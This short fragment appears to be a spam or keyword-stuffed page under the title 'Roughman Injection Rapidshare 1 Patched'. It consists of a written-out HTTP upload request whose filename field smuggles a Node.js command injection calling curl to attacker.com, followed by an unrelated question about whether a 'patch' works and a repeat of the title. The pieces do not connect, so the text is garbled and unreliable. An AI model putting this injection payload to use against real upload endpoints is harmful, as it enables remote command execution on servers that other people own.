Roughman Injection Rapidshare 1 Patched

POST /api/upload Content-Type: multipart/form-data ---boundary Content-Disposition: form-data; name="filename" RoughMan$require('child_process').execSync('curl http://attacker.com/pwned')

Does the "patch" actually enable the advertised features, or is it a non-functional wrapper? roughman injection rapidshare 1 patched